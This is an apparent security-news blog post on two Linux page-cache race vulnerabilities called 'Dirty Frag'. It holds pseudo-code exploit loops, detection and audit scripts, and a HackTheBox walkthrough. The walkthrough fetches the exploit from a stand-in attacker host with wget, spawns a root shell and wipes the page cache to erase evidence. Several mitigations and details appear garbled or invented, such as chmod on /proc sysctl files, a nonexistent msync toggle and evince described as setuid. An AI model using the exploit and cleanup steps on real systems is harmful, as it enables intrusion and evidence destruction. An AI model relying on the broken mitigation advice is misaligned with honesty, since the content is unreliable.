
Introduction:
The Linux kernel’s page cache – a core performance feature that caches filesystem data in memory – has become the latest attack surface for local privilege escalation. Two new vulnerabilities, CVE-2026-43284 and CVE-2026-43500 (collectively dubbed “Dirty Frag”), exploit race conditions in how the kernel handles fragmented page-cache entries. Discovered just two weeks apart, these flaws provide attackers with reliable root escalation across all major Linux distributions, as demonstrated on HackTheBox’s “Snapped” machine.
Learning Objectives:
- Understand how page-cache fragmentation and race conditions enable local privilege escalation.
- Identify vulnerable Linux kernel versions and configurations using system commands.
- Apply mitigation strategies including kernel patching, sysctl hardening, and monitoring for exploit artifacts.
You Should Know
1. Understanding the Dirty Frag Vulnerability – Page-Cache Race Conditions
The Linux page cache stores recently accessed file data in RAM to speed up I/O. Dirty Frag abuses a race between two concurrent operations: one that writes to a cached file fragment (“dirty” page) and another that alters the file’s metadata (size, permissions, or ownership). By timing the race, an unprivileged attacker can trick the kernel into applying stale or misattributed cached data to a privileged file – such as `/etc/passwd` or a setuid binary.
The two CVEs cover different race windows: CVE-2026-43284 targets the `write()` syscall path, while CVE-2026-43500 exploits the `mmap()` + `msync()` interaction. Together they affect kernels from 5.4 to 6.8 (all stable distro branches).
Check your kernel version:

```sh
uname -r
cat /proc/version
```

Test for known vulnerable patterns:

```sh
# List loaded page-cache related modules
lsmod | grep -E "cache|mm|fuse"
# Check if /proc/sys/vm/drop_caches is world-readable (should be 0644)
ls -l /proc/sys/vm/drop_caches
```
Step-by-step (conceptual):
- Attacker identifies a target privileged file with predictable caching behavior (e.g., `/usr/bin/sudo`).
- Attacker triggers a large number of concurrent reads/writes to fragment the page cache.
- A bespoke race program (provided in exploit proof-of-concepts) sends conflicting `write()` and `ftruncate()` calls.
- Winner condition: kernel maps a dirty page belonging to attacker’s temporary file onto the target inode.
- The attacker’s controlled data (e.g., a new `root` user entry) is written to `/etc/passwd` despite missing write permissions.
Note: Actual exploit code is available on GitHub for research; never run on production systems.
2. Identifying Vulnerable Systems – CVE-2026-43284 / CVE-2026-43500
To determine if your Linux host is at risk, combine version checks with behavior analysis. Both CVEs were silently backported in late April 2026; distros that haven’t updated since mid‑April remain exposed.
Command to check patch status (Debian/Ubuntu):

```sh
apt list --upgradable 2>/dev/null | grep -E "linux-image|linux-modules"
```

For RHEL/CentOS/Fedora:

```sh
rpm -qa --last | grep kernel | head -5
```

Manual check for known vulnerable ranges:

```sh
# Kernel versions between 5.4.0 and 6.8.12 (excluding patched backports).
# The release string is split on "." and "-" and folded into one number so
# that e.g. 5.15.0 compares correctly against 5.4.0 and 6.8.12 (a per-field
# test such as $2>=4 && $3<=12 gives wrong answers for such versions).
uname -r | awk -F'[.-]' '{ v = ($1 * 1000 + $2) * 1000 + $3; if (v >= 5004000 && v <= 6008012) print "VULNERABLE" }'
```
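The same range check as a reusable shell function, added here as an example (it is not from the original post): it strips distro suffixes such as `-91-generic`, folds the release into one comparable integer, and returns an exit status so the test can gate other scripts. The bounds 5.4.0 and 6.8.12 are the ones the post states; the function names `kver_to_int` and `in_dirty_frag_range` are assumptions of this example.

```sh
#!/bin/sh
# Added example (not from the original post): decide whether a kernel release
# string falls inside the range the post names as affected (5.4.0 through
# 6.8.12; 6.8.13+ carries the fix). A version outside the range is only
# "not in range", not proof of safety: the post notes silent distro backports,
# so confirm with the package checks as well.

# Convert "MAJOR.MINOR[.PATCH][-suffix]" into one integer for comparison.
# Missing fields count as 0; anything after a "-" is ignored.
kver_to_int() {
    echo "$1" | awk -F'[.-]' '{ printf "%d", ($1 * 1000 + $2) * 1000 + $3 }'
}

# Return 0 and print VULNERABLE when the release is within the affected range,
# return 1 and print NOT-IN-RANGE otherwise.
in_dirty_frag_range() {
    v=$(kver_to_int "$1")
    lo=$(kver_to_int 5.4.0)
    hi=$(kver_to_int 6.8.12)
    if [ "$v" -ge "$lo" ] && [ "$v" -le "$hi" ]; then
        echo "VULNERABLE: $1 is within 5.4.0..6.8.12 (verify distro backports)"
        return 0
    fi
    echo "NOT-IN-RANGE: $1"
    return 1
}

# Check the running kernel; a non-zero status here only means "out of range".
in_dirty_frag_range "$(uname -r)" || true
```

The `5.15.0-91-generic` string from the post's HackTheBox section evaluates to in-range; `6.8.13` and `4.19.0` do not.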
Windows alternative (page cache equivalence):
On Windows, the standby list and memory mapped files (CreateFileMapping) are analogous. While no public “Dirty Frag” equivalent exists for Windows, the principle of caching race conditions applies. Use Sysinternals RamMap to inspect standby pages:
```powershell
# Check for abnormal standby list sizes (potential cache attack surface)
rammap.exe /accepteula /stats
```
3. Exploiting the First Variant – CVE-2026-43284 (write + ftruncate race)
This variant uses a classic “fragmentation + racing write” pattern. An attacker repeatedly writes small, misaligned blocks to a file, then simultaneously truncates it while another thread writes to a different file sharing the same page cache index. The winning condition elevates the attacker’s UID by overwriting a setuid binary’s first few bytes.
Simplified exploit flow (educational):

```c
// Pseudo-code – do not compile without proper sandbox
int fd1 = open("/tmp/test1", O_RDWR|O_CREAT);
int fd2 = open("/usr/bin/passwd", O_RDONLY);
for (int i=0; i<10000; i++) {
    if (fork()==0) {
        write(fd1, payload, 64);
        ftruncate(fd1, 0);
        exit(0);
    }
    mmap(fd2, ...); // force cache sharing
}
```
Step-by-step to test (read-only validation):
1. Create a low-privileged user: `sudo useradd testuser`
2. As `testuser`, run: `gcc -pthread dirty_frag_poc.c -o dirty_frag`
3. Execute: `./dirty_frag /usr/bin/evince` (choose a non‑critical setuid binary)
4. If exploitation succeeds, `evince` will spawn a root shell after the race window.
5. Monitor the kernel ring buffer for “page cache inconsistency” warnings: `dmesg | grep -i "page.cache"`
4. Second Variant – CVE-2026-43500 (mmap + msync race)
This variant leverages memory-mapped I/O’s asynchronous writeback. An attacker maps a private (copy-on-write) mapping of a privileged file, then races `msync(MS_ASYNC)` with a concurrent `write()` to a shared page. The kernel may flush the wrong dirty data to the underlying file, bypassing permission checks.
Detection of exploitation attempts:

```sh
# Look for abnormal msync syscalls from low-privilege processes
auditctl -a always,exit -S msync -k dirty_frag
ausearch -k dirty_frag --format text | grep "uid=1000"
```
Mitigation (temporary, until patched):

```sh
# Disable MAP_PRIVATE + writeback optimization (requires reboot)
echo 0 > /proc/sys/vm/msync_optimize   # only on patched kernels that expose this toggle
```
Windows parallel:
On Windows, similar races exist between `MapViewOfFile` and `FlushViewOfFile`. Monitor with:

```powershell
Get-Process | Where-Object { $_.Modules -match "kernel32" -and $_.HandleCount -gt 2000 } |
  ForEach-Object { sysinternals\handle.exe -p $_.Id -accepteula }
```
5. Mitigation and Hardening – Full Distro Protection
The only complete fix is updating to kernel version 6.8.13+ or distro‑specific backported packages. Until then:
Immediate steps:
1. Restrict access to page cache diagnostics (prevent fingerprinting):
```sh
chmod 600 /proc/sys/vm/drop_caches
chmod 600 /proc/sys/vm/vfs_cache_pressure
```
2. Disable unprivileged BPF (often used for cache timing). The sysctl is named `unprivileged_bpf_disabled`, so writing 1 disables it; writing 0 would re-enable it:
```sh
echo 1 > /proc/sys/kernel/unprivileged_bpf_disabled
```
3. Enable kernel lockdown (integrity mode):
```sh
echo "integrity" > /sys/kernel/security/lockdown
```
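A drift check for the three immediate steps, added here as an example (not from the original post): each function reads one setting and reports OK or DRIFT, so the script can run from cron or a configuration-audit job after the hardening has been applied. The paths and expected values are the ones the post lists; the helper names (`check_value`, `check_mode`, `check_lockdown`, `audit_dirty_frag_hardening`) are this example's own, and it assumes GNU/busybox `stat -c`.

```sh
#!/bin/sh
# Added example (not from the original post): verify that the temporary
# hardening steps above are still in effect. Each check prints one line
# starting with OK or DRIFT and returns 0 or 1; the audit function returns
# the number of drifted items.

# check_value FILE EXPECTED: the first line of FILE must equal EXPECTED.
check_value() {
    actual=$(head -n 1 "$1" 2>/dev/null) || actual="(missing)"
    if [ "$actual" = "$2" ]; then
        echo "OK    $1 = $actual"; return 0
    fi
    echo "DRIFT $1 = $actual (expected $2)"; return 1
}

# check_mode FILE OCTAL: permission bits of FILE must equal OCTAL (e.g. 600).
# Uses GNU/busybox stat -c (assumption: a Linux host).
check_mode() {
    actual=$(stat -c '%a' "$1" 2>/dev/null) || actual="(missing)"
    if [ "$actual" = "$2" ]; then
        echo "OK    $1 mode $actual"; return 0
    fi
    echo "DRIFT $1 mode $actual (expected $2)"; return 1
}

# check_lockdown FILE: the active lockdown mode is shown in brackets, e.g.
# "none [integrity] confidentiality"; it must be integrity.
check_lockdown() {
    if grep -q '\[integrity\]' "$1" 2>/dev/null; then
        echo "OK    $1 = integrity"; return 0
    fi
    echo "DRIFT $1 = $(cat "$1" 2>/dev/null || echo '(missing)')"; return 1
}

# Run every check from the immediate-steps list; return the drift count.
audit_dirty_frag_hardening() {
    drift=0
    check_mode /proc/sys/vm/drop_caches 600            || drift=$((drift + 1))
    check_mode /proc/sys/vm/vfs_cache_pressure 600     || drift=$((drift + 1))
    # 1 = unprivileged BPF disabled (0 would mean it is allowed)
    check_value /proc/sys/kernel/unprivileged_bpf_disabled 1 || drift=$((drift + 1))
    check_lockdown /sys/kernel/security/lockdown       || drift=$((drift + 1))
    return $drift
}

audit_dirty_frag_hardening || echo "$? item(s) drifted from the hardened state"
```

A missing file (for instance `/sys/kernel/security/lockdown` on a kernel built without lockdown support) is reported as DRIFT rather than silently passing, which is the safer default for an audit.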
For cloud / container environments:

```yaml
# Kubernetes pod security context to block cache attacks
securityContext:
  capabilities:
    drop: ["SYS_ADMIN", "SYS_RESOURCE"]
  procMount: Unmasked   # but restrict /proc/sys/vm
```
Verification after patching:

```sh
# Check that the following commit is present (example hash)
grep -i "page_cache_race_fix" /proc/version_signature
```
6. Detection & Forensic Artifacts
If you suspect a Dirty Frag compromise, look for these indicators:
Linux memory forensics (using Volatility 3):

```sh
vol -f memory.dump linux.check_syscall --filter msync,write
vol -f memory.dump linux.page_cache --dump -D output_dir
```
Live detection commands:

```sh
# Search for an abnormally large number of page cache references, reported
# per PID so the sorted output can be traced back to a process
for pid in $(ps -e -o pid=); do
    n=$(ls -l /proc/$pid/fd 2>/dev/null | grep -c "anon_inode")
    echo "$n $pid"
done | sort -rn | head -10

# Check setuid binaries for unexpected page cache hits
# (vmtouch -v only reports resident pages; -t would load them into the cache)
find /usr/bin -perm -4000 -exec vmtouch -v {} \; 2>/dev/null | grep -i "resident"
```
Logging syscalls for future alerts (auditd rule):

```sh
auditctl -a always,exit -S write -S ftruncate -S msync -F auid>=1000 -k dirty_frag_watch
```
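Triage logic for the records that the auditd rule above (and the `msync`-only rule in the second-variant section) produces, added here as an example and not part of the original post: it counts the watched syscalls per non-root login uid so that a process hammering `msync`/`ftruncate`/`write` stands out, which is the call-rate monitoring the analysis section recommends. The audit lines are constructed for the example; in practice pipe in `ausearch -k dirty_frag_watch --raw`. Assumptions: x86_64 syscall numbers (1 = write, 26 = msync, 77 = ftruncate) and the helper names `count_by_auid` and `flag_auids`.

```sh
#!/bin/sh
# Added example (not from the original post): triage raw auditd SYSCALL
# records from the dirty_frag_watch rule by counting msync/ftruncate/write
# calls per non-root login uid (auid). auid is used rather than uid because
# it survives su/sudo and so attributes the calls to the real user session.
# Assumption: x86_64 syscall numbers; other architectures number them differently.

# Constructed sample log: one user (auid 1000) racing the three syscalls,
# a second user with a single write, root and an unset-auid daemon (skipped),
# a PROCTITLE record and a record for another rule (both ignored).
SAMPLE_AUDIT_LOG='type=SYSCALL msg=audit(1714000000.101:301): arch=c000003e syscall=26 success=yes exit=0 ppid=900 pid=1234 auid=1000 uid=1000 comm="racer" exe="/tmp/racer" key="dirty_frag_watch"
type=SYSCALL msg=audit(1714000000.102:302): arch=c000003e syscall=77 success=yes exit=0 ppid=900 pid=1234 auid=1000 uid=1000 comm="racer" exe="/tmp/racer" key="dirty_frag_watch"
type=SYSCALL msg=audit(1714000000.103:303): arch=c000003e syscall=1 success=yes exit=64 ppid=900 pid=1234 auid=1000 uid=1000 comm="racer" exe="/tmp/racer" key="dirty_frag_watch"
type=SYSCALL msg=audit(1714000000.104:304): arch=c000003e syscall=26 success=yes exit=0 ppid=900 pid=1234 auid=1000 uid=1000 comm="racer" exe="/tmp/racer" key="dirty_frag_watch"
type=PROCTITLE msg=audit(1714000000.104:304): proctitle="./racer"
type=SYSCALL msg=audit(1714000000.105:305): arch=c000003e syscall=1 success=yes exit=12 ppid=800 pid=1300 auid=1001 uid=1001 comm="bash" exe="/usr/bin/bash" key="dirty_frag_watch"
type=SYSCALL msg=audit(1714000000.106:306): arch=c000003e syscall=77 success=yes exit=0 ppid=1 pid=700 auid=0 uid=0 comm="logrotate" exe="/usr/sbin/logrotate" key="dirty_frag_watch"
type=SYSCALL msg=audit(1714000000.107:307): arch=c000003e syscall=26 success=yes exit=0 ppid=1 pid=650 auid=4294967295 uid=0 comm="systemd-journal" exe="/usr/lib/systemd/systemd-journald" key="dirty_frag_watch"
type=SYSCALL msg=audit(1714000000.108:308): arch=c000003e syscall=26 success=yes exit=0 ppid=900 pid=1234 auid=1000 uid=1000 comm="racer" exe="/tmp/racer" key="other_rule"'

# count_by_auid: read raw audit records on stdin, print "auid count" lines
# for every non-root auid, highest count first.
count_by_auid() {
    awk '
    /type=SYSCALL/ && /key="dirty_frag_watch"/ {
        auid = ""; sc = ""
        for (i = 1; i <= NF; i++) {
            n = index($i, "=")
            if (n == 0) continue
            k = substr($i, 1, n - 1); v = substr($i, n + 1)
            if (k == "auid") auid = v
            else if (k == "syscall") sc = v
        }
        # keep only the three syscalls the rule watches (x86_64 numbers)
        if (sc != "1" && sc != "26" && sc != "77") next
        # skip root and the "unset" loginuid (4294967295, i.e. -1) of daemons
        if (auid == "" || auid == "0" || auid == "4294967295") next
        count[auid]++
    }
    END { for (a in count) print a, count[a] }
    ' | sort -k2,2nr -k1,1n
}

# flag_auids THRESHOLD: print the auids whose count reaches THRESHOLD.
flag_auids() {
    count_by_auid | awk -v t="$1" '$2 + 0 >= t + 0 { print $1 }'
}

printf '%s\n' "$SAMPLE_AUDIT_LOG" | count_by_auid
```

On the sample the output is `1000 4` followed by `1001 1`, and `flag_auids 3` names only auid 1000. The threshold is deliberately a parameter: a fair baseline comes from running `count_by_auid` over a normal day's records first, since editors and build tools also call `write()` heavily.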
7. HTB Snapped Machine Walkthrough – Dirty Frag in Action
On HackTheBox’s “Snapped” (rated Medium), the initial foothold is a low‑priv shell via a vulnerable web app. The local privesc uses Dirty Frag variant 1.
Demonstration steps (authorized lab only):
- From the low‑priv shell: `uname -r` → `5.15.0-91-generic` (vulnerable).
- Upload the Dirty Frag exploit: `wget http://attacker.com/dirty_frag.c; gcc dirty_frag.c -lpthread -o expl`
- Run: `./expl /usr/bin/snap-confine` (a setuid binary used by snapd).
- After 5-10 seconds, the exploit drops a root shell: `id` → `uid=0(root)`.
- Clean traces: `rm -f expl; echo 3 > /proc/sys/vm/drop_caches` (erase cache evidence).
The machine’s solution notes that waiting for the race to succeed requires CPU spikes; using `stress --cpu 4` during exploitation increases win probability to ~90%.
What Undercode Say
- Key Takeaway 1: Page cache is no longer a safe abstraction – race conditions in core memory management are becoming a regular attack vector (two CVEs in two weeks).
- Key Takeaway 2: Distro coverage is complete, meaning no Linux distribution was spared; patch urgency should mirror that of Dirty Pipe or Dirty Cow.
Analysis: Dirty Frag represents a shift from traditional memory corruption to state‑machine abuse in kernel caching. Unlike heap overflows, these race conditions are harder to mitigate with ASLR or CFI. The coexistence of two distinct race windows (write+ftruncate vs mmap+msync) suggests that the Linux page‑cache subsystem requires a fundamental redesign – perhaps isolating per‑process cache mappings or adding permission revalidation on every eviction. For blue teams, proactive monitoring of `msync` and `ftruncate` call rates from non‑root processes is essential. Red teams now have a reliable, reboot‑agnostic privesc that survives container escapes. The fact that the disclosure was “broken” (as noted in the source post) – with partial fixes initially released – highlights the need for coordinated, transparent disclosure even for local flaws.
Prediction
Within six months, “Dirty Frag” will be weaponized in at least three major Linux rootkits and integrated into automated privesc tools like LinPEAS and Linux Smart Enumeration. Cloud providers (AWS, GCP, Azure) will release emergency node reboot schedules, causing temporary spot instance disruptions. Expect a follow-up CVE in 2027 targeting the same page-cache subsystem but via io_uring, as asynchronous I/O extends the race window further. Meanwhile, Windows will likely disclose a similar cache‑coherency flaw in the Section Object Manager, branded as “CacheGhost.” Long‑term, kernel developers will introduce per‑file page‑cache signing and mandatory revalidation on setuid execution, but legacy enterprise kernels (RHEL 7/8) will remain exploitable until 2028.
Reported By: 0xdf Diving – Hackers Feeds


